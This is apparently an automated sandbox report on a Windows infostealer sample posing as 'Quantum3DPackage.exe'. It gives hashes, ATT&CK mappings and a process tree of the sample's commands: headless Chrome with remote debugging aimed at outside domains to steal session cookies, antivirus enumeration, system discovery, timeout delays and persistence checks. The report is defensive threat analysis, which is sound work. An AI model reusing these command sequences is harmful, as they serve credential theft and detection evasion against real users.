bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
01-08-2024 08:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quantum3DPackage.exe
Size

8.0MB
MD5

7a9e91cd05bb23625354d0f46066904c
SHA1

7389f1881aba1c2ba3544321bd068bbf91dfa00a
SHA256

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40
SHA512

cdcd8c13f582682279463afc1a6196b65e127a0cb344632f1c2222f8f64793ae8c19547758eda94ece0bc9526b6ed13e552c3f6c9dbc2c6f157e601cbbc95c65
SSDEEP

49152:BYyqyQ4SjTErF0JwHoLjhbi4zmkKm0W85GNLZLgKT/MNMNngOdTMnWAqkeKbr3kg:PgR2HoLtb

Score

8^/10

credential_access discovery stealer

Malware Config

Signatures

Uses browser remote debugging 2 TTPs 2 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

chrome.exechrome.exe

pid process

2928 chrome.exe
680 chrome.exe
Executes dropped EXE 6 IoCs

Processes:

kedb.exea2-stl-0729-early-(1)-TESTED.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exe

pid process

1288 kedb.exe
2432 a2-stl-0729-early-(1)-TESTED.exe
884 PsInfo.exe
2544 PsInfo64.exe
2388 PsInfo64.exe
2076 PsInfo64.exe
Loads dropped DLL 3 IoCs

Processes:

chrome.execmd.exe

pid process

2928 chrome.exe
2928 chrome.exe
2560 cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2928	chrome.exe
680	chrome.exe

pid	process
1288	kedb.exe
2432	a2-stl-0729-early-(1)-TESTED.exe
884	PsInfo.exe
2544	PsInfo64.exe
2388	PsInfo64.exe
2076	PsInfo64.exe

pid	process
2928	chrome.exe
2928	chrome.exe
2560	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

kedb.exePsInfo.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PsInfo.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe

Delays execution with timeout.exe 18 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2884	timeout.exe
2936	timeout.exe
1708	timeout.exe
2288	timeout.exe
1192	timeout.exe
1672	timeout.exe
2848	timeout.exe
2088	timeout.exe
2552	timeout.exe
2724	timeout.exe
1728	timeout.exe
2600	timeout.exe
2080	timeout.exe
1144	timeout.exe
1324	timeout.exe
3060	timeout.exe
2692	timeout.exe
2584	timeout.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1340 systeminfo.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

kedb.exePsInfo.exe

pid process

1288 kedb.exe
884 PsInfo.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

chrome.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exe

pid process

2928 chrome.exe
884 PsInfo.exe
884 PsInfo.exe
2544 PsInfo64.exe
2544 PsInfo64.exe
2388 PsInfo64.exe
2388 PsInfo64.exe
2076 PsInfo64.exe
2076 PsInfo64.exe

pid	process
1340	systeminfo.exe

pid	process
1288	kedb.exe
884	PsInfo.exe

pid	process
2928	chrome.exe
884	PsInfo.exe
884	PsInfo.exe
2544	PsInfo64.exe
2544	PsInfo64.exe
2388	PsInfo64.exe
2388	PsInfo64.exe
2076	PsInfo64.exe
2076	PsInfo64.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

WMIC.exechrome.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1916	WMIC.exe
Token: SeSecurityPrivilege	1916	WMIC.exe
Token: SeTakeOwnershipPrivilege	1916	WMIC.exe
Token: SeLoadDriverPrivilege	1916	WMIC.exe
Token: SeSystemProfilePrivilege	1916	WMIC.exe
Token: SeSystemtimePrivilege	1916	WMIC.exe
Token: SeProfSingleProcessPrivilege	1916	WMIC.exe
Token: SeIncBasePriorityPrivilege	1916	WMIC.exe
Token: SeCreatePagefilePrivilege	1916	WMIC.exe
Token: SeBackupPrivilege	1916	WMIC.exe
Token: SeRestorePrivilege	1916	WMIC.exe
Token: SeShutdownPrivilege	1916	WMIC.exe
Token: SeDebugPrivilege	1916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1916	WMIC.exe
Token: SeRemoteShutdownPrivilege	1916	WMIC.exe
Token: SeUndockPrivilege	1916	WMIC.exe
Token: SeManageVolumePrivilege	1916	WMIC.exe
Token: 33	1916	WMIC.exe
Token: 34	1916	WMIC.exe
Token: 35	1916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1916	WMIC.exe
Token: SeSecurityPrivilege	1916	WMIC.exe
Token: SeTakeOwnershipPrivilege	1916	WMIC.exe
Token: SeLoadDriverPrivilege	1916	WMIC.exe
Token: SeSystemProfilePrivilege	1916	WMIC.exe
Token: SeSystemtimePrivilege	1916	WMIC.exe
Token: SeProfSingleProcessPrivilege	1916	WMIC.exe
Token: SeIncBasePriorityPrivilege	1916	WMIC.exe
Token: SeCreatePagefilePrivilege	1916	WMIC.exe
Token: SeBackupPrivilege	1916	WMIC.exe
Token: SeRestorePrivilege	1916	WMIC.exe
Token: SeShutdownPrivilege	1916	WMIC.exe
Token: SeDebugPrivilege	1916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1916	WMIC.exe
Token: SeRemoteShutdownPrivilege	1916	WMIC.exe
Token: SeUndockPrivilege	1916	WMIC.exe
Token: SeManageVolumePrivilege	1916	WMIC.exe
Token: 33	1916	WMIC.exe
Token: 34	1916	WMIC.exe
Token: 35	1916	WMIC.exe
Token: 33	2928	chrome.exe
Token: SeIncBasePriorityPrivilege	2928	chrome.exe
Token: 33	2928	chrome.exe
Token: SeIncBasePriorityPrivilege	2928	chrome.exe
Token: 33	2928	chrome.exe
Token: SeIncBasePriorityPrivilege	2928	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Quantum3DPackage.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exechrome.execmd.exe

description	pid	process	target process
PID 1956 wrote to memory of 2544	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2544	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2544	1956	Quantum3DPackage.exe	cmd.exe
PID 2544 wrote to memory of 1324	2544	cmd.exe	timeout.exe
PID 2544 wrote to memory of 1324	2544	cmd.exe	timeout.exe
PID 2544 wrote to memory of 1324	2544	cmd.exe	timeout.exe
PID 1956 wrote to memory of 2388	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2388	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2388	1956	Quantum3DPackage.exe	cmd.exe
PID 2388 wrote to memory of 1728	2388	cmd.exe	timeout.exe
PID 2388 wrote to memory of 1728	2388	cmd.exe	timeout.exe
PID 2388 wrote to memory of 1728	2388	cmd.exe	timeout.exe
PID 1956 wrote to memory of 2316	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2316	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2316	1956	Quantum3DPackage.exe	cmd.exe
PID 2316 wrote to memory of 2848	2316	cmd.exe	timeout.exe
PID 2316 wrote to memory of 2848	2316	cmd.exe	timeout.exe
PID 2316 wrote to memory of 2848	2316	cmd.exe	timeout.exe
PID 1956 wrote to memory of 2684	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2684	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2684	1956	Quantum3DPackage.exe	cmd.exe
PID 2684 wrote to memory of 2884	2684	cmd.exe	timeout.exe
PID 2684 wrote to memory of 2884	2684	cmd.exe	timeout.exe
PID 2684 wrote to memory of 2884	2684	cmd.exe	timeout.exe
PID 1956 wrote to memory of 1972	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 1972	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 1972	1956	Quantum3DPackage.exe	cmd.exe
PID 1972 wrote to memory of 2936	1972	cmd.exe	timeout.exe
PID 1972 wrote to memory of 2936	1972	cmd.exe	timeout.exe
PID 1972 wrote to memory of 2936	1972	cmd.exe	timeout.exe
PID 1956 wrote to memory of 2868	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2868	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2868	1956	Quantum3DPackage.exe	cmd.exe
PID 2868 wrote to memory of 2600	2868	cmd.exe	timeout.exe
PID 2868 wrote to memory of 2600	2868	cmd.exe	timeout.exe
PID 2868 wrote to memory of 2600	2868	cmd.exe	timeout.exe
PID 1956 wrote to memory of 748	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 748	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 748	1956	Quantum3DPackage.exe	cmd.exe
PID 748 wrote to memory of 3060	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 3060	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 3060	748	cmd.exe	timeout.exe
PID 1956 wrote to memory of 2816	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2816	1956	Quantum3DPackage.exe	cmd.exe
PID 1956 wrote to memory of 2816	1956	Quantum3DPackage.exe	cmd.exe
PID 2816 wrote to memory of 2080	2816	cmd.exe	timeout.exe
PID 2816 wrote to memory of 2080	2816	cmd.exe	timeout.exe
PID 2816 wrote to memory of 2080	2816	cmd.exe	timeout.exe
PID 1956 wrote to memory of 2928	1956	Quantum3DPackage.exe	chrome.exe
PID 1956 wrote to memory of 2928	1956	Quantum3DPackage.exe	chrome.exe
PID 1956 wrote to memory of 2928	1956	Quantum3DPackage.exe	chrome.exe
PID 1956 wrote to memory of 2928	1956	Quantum3DPackage.exe	chrome.exe
PID 2928 wrote to memory of 2800	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 2800	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 2800	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 2208	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 2208	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 2208	2928	chrome.exe	cmd.exe
PID 2208 wrote to memory of 1916	2208	cmd.exe	WMIC.exe
PID 2208 wrote to memory of 1916	2208	cmd.exe	WMIC.exe
PID 2208 wrote to memory of 1916	2208	cmd.exe	WMIC.exe
PID 2928 wrote to memory of 1664	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 1664	2928	chrome.exe	cmd.exe
PID 2928 wrote to memory of 1664	2928	chrome.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Quantum3DPackage.exe
"C:\Users\Admin\AppData\Local\Temp\Quantum3DPackage.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://trujillolauriannelamar.com
2⤵
- Uses browser remote debugging
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
3⤵
PID:2800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\385 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\385 > C:\Users\Admin\AppData\Local\temp\242
3⤵
PID:1664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o bxlg.zip
3⤵
PID:2548

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o bxlg.zip
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg 2>&1
3⤵
PID:892

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:1340

C:\Windows\system32\findstr.exe
findstr /C:"OS Name"
4⤵
PID:924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
PID:1584

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:2088

C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe
"C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe"
3⤵
- Executes dropped EXE
PID:2432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1612

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2844

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2616

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2612

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1232

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1568

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2804

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1648

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://annetteedgardomalcolm.com
4⤵
- Uses browser remote debugging
PID:680

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
5⤵
PID:1476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\toatl"& "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\toatl"
3⤵
- Loads dropped DLL
PID:2560

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:884

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\toatl" & "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\toatl"
3⤵
PID:1576

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2388

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:2888

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:2980

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:2716

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:2192

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:660

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:2200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:1916

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:1664

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:3044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
PID:568

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:1144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Modify Authentication Process

T1556

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\temp\385

Filesize
32B

MD5
b65e9213dae00101a52d72b56120ff81

SHA1
d52caec94e56a19cca2bcc6e38dc780b1cb90027

SHA256
dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740

SHA512
09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

Download Submit
C:\Users\Admin\AppData\Local\temp\clfb

Filesize
16B

MD5
b1ee3fc6ec4681dda580f6e911d9436f

SHA1
87a72d824a3788f19febbb863049afce981222be

SHA256
bd855b46dfb470ce12bbffa2f4d50534ca722a4ca834bd24bc7ceb471e4d6f0e

SHA512
ed5be398a0f8094d86196eb886b2ba9cea2edb998dd3fc47cf0d8f6d32c5ea37f8ab8161262a6717785335368cc16cd728505a1f58c082c3c143547a4051988a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\1E3D6E

Filesize
154B

MD5
70391d4972eb60c0f2af59340f48fe6a

SHA1
0c189e774a6fa13acf2bd00bec1e5ef9b5cc6296

SHA256
44b00a09e9f66ebe088c651cbe8910ac750515991a9bf1eed11ab94e16b823ed

SHA512
03294e94718f40dc717b1ad594afbfcce35c00be8c4c88ece49a45d108c9f390263e951ee93c9edbe7efa59f8af01bac9d9265a0ee632b984b5d6bc53798276c

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe

Filesize
306KB

MD5
624adb0f45cbb9cadad83c264df98891

SHA1
e839ce1e0446d8da889935f411f0fb7ad54d4b3e

SHA256
8f401dc021e20ff3abc64a2d346ef6a792a5643ca04ffd1f297e417532acaa06

SHA512
b29b3a72cd32ee34ec6ce357818658b8a89c399e2f8439a7f49fb1a506ed912f41afa19bc5c142c9a4539acc5966a29c6a6637c23de0dc3e5f2d85264620bdba

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bxlg.zip

Filesize
996KB

MD5
9e73fb50d37e37ee8bd19a8e3d2b82ca

SHA1
3db1c548e86e4bb7457324a3097b05da15b7ffc3

SHA256
68ba7122ee8d9ce34ed94b6036a171ce38d6d9d9b3a609c2f4de773f4dd40d5c

SHA512
b41209300f018103b0f8a4de0537f348a3bdfcbc8feb19e7fec6634b06c266cc442145fd2d9230f827f273b0d07bb6bbcab7a0f0e9e1f558e6dd7a076f568094

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg

Filesize
58B

MD5
27781566506fb8c0cae4843013014f2c

SHA1
2dcd6c4bee9417293c0f5eea83257d23b9be3ae0

SHA256
56e5d44ed8db1fd4bfbf1c4fcb820eb013c861ff980be837666b3c5cb6c64544

SHA512
9b03ad498ed140261206f62b767d8765fab7e43f9984967f0fa8d2451375ebe09fc7d48bd9fa9e187d50b69c2db546c4575e5d9ab0f3a80890e0c17792ece64d

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout

Filesize
17B

MD5
2fb06e7d194b236d2a1c48c9e19427b5

SHA1
c6bc50a41364af8cfc8b636eda62c39e8582a609

SHA256
d08f05765faf00c98d80ba8f9ce214d1d243bdca57e6f0257af61d876e1fc7f0

SHA512
ee05a6ba0a7f4838216f0c084c094c2f1d47fe8f40003ede4a80477631c100ca3171ee2e504fd69fc13482334d721f46614331dc20a6b66821d17de42879f522

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe

Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\toatl

Filesize
3KB

MD5
20725604b5717797c3b235b87d0d1bb7

SHA1
4a79018c654be384eedc375642780d7c453136eb

SHA256
62ba77d41133a92325b48ba8299f114898a6a02ef78e96ef3da0be868bdd25b1

SHA512
27c2c6e1653705c497a2c4131ae6f9aa2fb6d0b320881b57a15a5b9cd47ce37e38818f115e155cbf93c9f940b458067a305dcb639aa0b0e73f9780c5975c3071

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\toatl

Filesize
579B

MD5
1fd62e94c38ef8e712d774f54e7c334a

SHA1
fc0561c0747b815ae9e3ec2821c21b0d8472f247

SHA256
